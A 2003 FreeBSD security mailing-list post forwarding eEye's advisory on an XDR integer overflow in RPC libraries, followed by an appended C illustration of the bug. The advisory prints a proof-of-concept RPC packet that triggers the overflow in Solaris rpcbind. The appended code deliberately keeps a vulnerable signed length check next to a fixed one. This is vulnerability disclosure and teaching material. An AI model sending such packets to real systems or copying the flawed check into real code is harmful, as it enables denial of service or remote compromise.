From owner-freebsd-security Wed Mar 19 12:50:23 2003
Date: Wed, 19 Mar 2003 15:54:49 -0500
From: Mike Tancsa <mike@sentex.net>
To: security@freebsd.org
Subject: Fwd: EEYE: XDR Integer Overflow

Anyone know if this affects FreeBSD? There is no mention in the CERT advisory.

        ---Mike

>From: "Marc Maiffret"
>To: "BUGTRAQ"
>Subject: EEYE: XDR Integer Overflow
>Date: Wed, 19 Mar 2003 12:20:14 -0800
>
>XDR Integer Overflow
>
>Release Date:
>March 19, 2003
>
>Severity:
>High (Remote Code Execution/Denial of Service)
>
>Systems Affected:
>
>Sun Microsystems Network Services Library (libnsl)
>BSD-derived libraries with XDR/RPC routines (libc)
>GNU C library with sunrpc (glibc)
>
>Description:
>
>XDR is a standard for the description and encoding of data which is used
>heavily in RPC implementations. Several libraries exist that allow a
>developer to incorporate XDR into his or her applications. Vulnerabilities
>were discovered in these libraries during the testing of new Retina auditing
>technologies developed by the eEye research department.
>
>ADAM and EVE are two technologies developed by eEye to remotely and locally
>audit applications for the existence of common vulnerabilities. During an
>ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR
>library. By supplying specific integer values in length fields during an RPC
>transaction, we were able to produce various overflow conditions in UNIX RPC
>services.
>
>Technical Description:
>
>The xdrmem_getbytes() function in the XDR library provided by Sun
>Microsystems contains an integer overflow. Depending on the location and use
>of the vulnerable xdrmem_getbytes() routine, various conditions may be
>presented that can permit an attacker to remotely exploit a service using
>this vulnerable routine.
>
>For the purpose of signature development and further security research a
>sample session is included below that replicates an integer overflow in the
>rpcbind shipped with various versions of the Solaris operating system.
>
>char evil_rpc[] =
>
>"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
>"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
>"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
>"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
>"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
>"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
>"\xFF\xFF\xFF\xFF" // RPC argument length
>"EEYECLIPSE2003";
>
>Vendor Status:
>
>Sun Microsystems was contacted on November 13, 2002 and CERT was contacted
>shortly afterwards. Vendors believed to be vulnerable were contacted by CERT
>during a grace period of several months. Due to some difficulties
>communicating with vendors, after rescheduling several times a release date
>was set for March 18, 2003.
>
>eEye recommends obtaining the necessary patches or updates from vendors as
>they become available after the release of this and the CERT advisory.
>
>For a list of vendors and their responses, please review the CERT advisory
>at: http://www.cert.org/advisories/CA-2003-10.html
>
>You can find the latest copy of this advisory, along with other eEye
>research at http://www.eeye.com/.
>
>Credit:
>Riley Hassell - Senior Research Associate
>
>Greetings:
>Liver destroyers of the world:
>Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn.
>
>Copyright (c) 1998-2003 eEye Digital Security
>Permission is hereby granted for the redistribution of this alert
>electronically. It is not to be edited in any way without express consent of
>eEye. If you wish to reprint the whole or any part of this alert in any
>other medium excluding electronic medium, please e-mail alert@eEye.com for
>permission.
>
>Disclaimer
>The information within this paper may change without notice. Use of this
>information constitutes acceptance for use in an AS IS condition. There are
>NO warranties with regard to this information. In no event shall the author
>be liable for any damages whatsoever arising out of or in connection with
>the use or spread of this information. Any use of this information is at the
>user's own risk.
>
>Feedback
>Please send suggestions, updates, and comments to:
>
>eEye Digital Security
>http://www.eEye.com
>info@eEye.com

--------------------------------------------------------------------
Mike Tancsa,                                          tel +1 519 651 3400
Sentex Communications,                                mike@sentex.net
Providing Internet since 1994                         www.sentex.net
Cambridge, Ontario Canada                             www.sentex.net/mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
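An added illustration of the bug class the forwarded advisory describes, not part of Mike's mail, the eEye advisory, or any vendor's XDR library: a simplified XDR memory decoder whose length check keeps the remaining byte count in a signed int and subtracts the untrusted length before testing the sign, beside a check that compares as unsigned values first. The struct, function names and the two sample buffers are constructed for this example; the oversized sample only reuses the length field shape shown in the advisory (0xFFFFFFFF followed by a short payload), and the hardened decoder rejects it without touching memory.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Hypothetical XDR memory stream (a model for this example, not the
 * libc/libnsl struct): a cursor over a caller-supplied buffer. */
struct xdrmem {
    const unsigned char *cur;
    size_t remaining;
};

/* Read one XDR unsigned int (4 bytes, big-endian). Returns 1 on success. */
static int xdr_get_u32(struct xdrmem *x, uint32_t *out)
{
    if (x->remaining < 4)
        return 0;
    *out = ((uint32_t)x->cur[0] << 24) | ((uint32_t)x->cur[1] << 16) |
           ((uint32_t)x->cur[2] << 8)  |  (uint32_t)x->cur[3];
    x->cur += 4;
    x->remaining -= 4;
    return 1;
}

/* Illustrative model of the flawed pattern: bytes left are a signed int and
 * the requested length is subtracted before the sign test. With
 * len = 0xFFFFFFFF the subtraction wraps to a small positive value and the
 * request is accepted. Returns 1 if the request would be accepted. */
int length_check_signed(int remaining, uint32_t len)
{
    remaining -= len;   /* computed in unsigned arithmetic, truncated to int */
    return remaining >= 0;
}

/* Hardened check: compare as unsigned values before any arithmetic on the
 * untrusted length, so nothing can wrap. */
int length_check_unsigned(size_t remaining, uint32_t len)
{
    return len <= remaining;
}

/* Decode an XDR opaque (length-prefixed bytes) through the hardened check.
 * Returns bytes copied, or -1 on a short or oversized message. */
long xdr_get_opaque(struct xdrmem *x, unsigned char *out, size_t outcap)
{
    uint32_t len;
    if (!xdr_get_u32(x, &len))
        return -1;
    if (!length_check_unsigned(x->remaining, len) || len > outcap)
        return -1;
    memcpy(out, x->cur, len);
    x->cur += len;
    x->remaining -= len;
    return (long)len;
}

/* Constructed sample: length field 0xFFFFFFFF followed by 14 payload bytes. */
static const unsigned char SAMPLE_OVERSIZED[] = {
    0xFF, 0xFF, 0xFF, 0xFF,
    'E','E','Y','E','C','L','I','P','S','E','2','0','0','3'
};

/* Constructed well-formed opaque: length 5, "hello", 3 bytes of XDR padding. */
static const unsigned char SAMPLE_VALID[] = {
    0x00, 0x00, 0x00, 0x05, 'h','e','l','l','o', 0x00, 0x00, 0x00
};

/* Feed the oversized sample to the signed check; 1 means it was accepted. */
int oversized_accepted_by_signed_check(void)
{
    struct xdrmem x = { SAMPLE_OVERSIZED, sizeof SAMPLE_OVERSIZED };
    uint32_t len;
    if (!xdr_get_u32(&x, &len))
        return -1;
    return length_check_signed((int)x.remaining, len);
}

/* Same sample through the unsigned check; 0 means it was rejected. */
int oversized_accepted_by_unsigned_check(void)
{
    struct xdrmem x = { SAMPLE_OVERSIZED, sizeof SAMPLE_OVERSIZED };
    uint32_t len;
    if (!xdr_get_u32(&x, &len))
        return -1;
    return length_check_unsigned(x.remaining, len);
}

/* Full decode of each sample through the hardened path. */
long decode_oversized_opaque(void)
{
    unsigned char out[64];
    struct xdrmem x = { SAMPLE_OVERSIZED, sizeof SAMPLE_OVERSIZED };
    return xdr_get_opaque(&x, out, sizeof out);
}

long decode_valid_opaque(void)
{
    unsigned char out[64];
    struct xdrmem x = { SAMPLE_VALID, sizeof SAMPLE_VALID };
    return xdr_get_opaque(&x, out, sizeof out);
}

int main(void)
{
    printf("signed check accepts 0xFFFFFFFF:   %d\n", oversized_accepted_by_signed_check());
    printf("unsigned check accepts 0xFFFFFFFF: %d\n", oversized_accepted_by_unsigned_check());
    printf("hardened decode, oversized: %ld\n", decode_oversized_opaque());
    printf("hardened decode, valid:     %ld\n", decode_valid_opaque());
    return 0;
}
```

The point to take from the two checks is the order of operations: any test that does arithmetic on an attacker-controlled length before comparing it against the space left is a candidate for this class of bug, and auditing a decoder means looking for exactly that pattern rather than for one magic value.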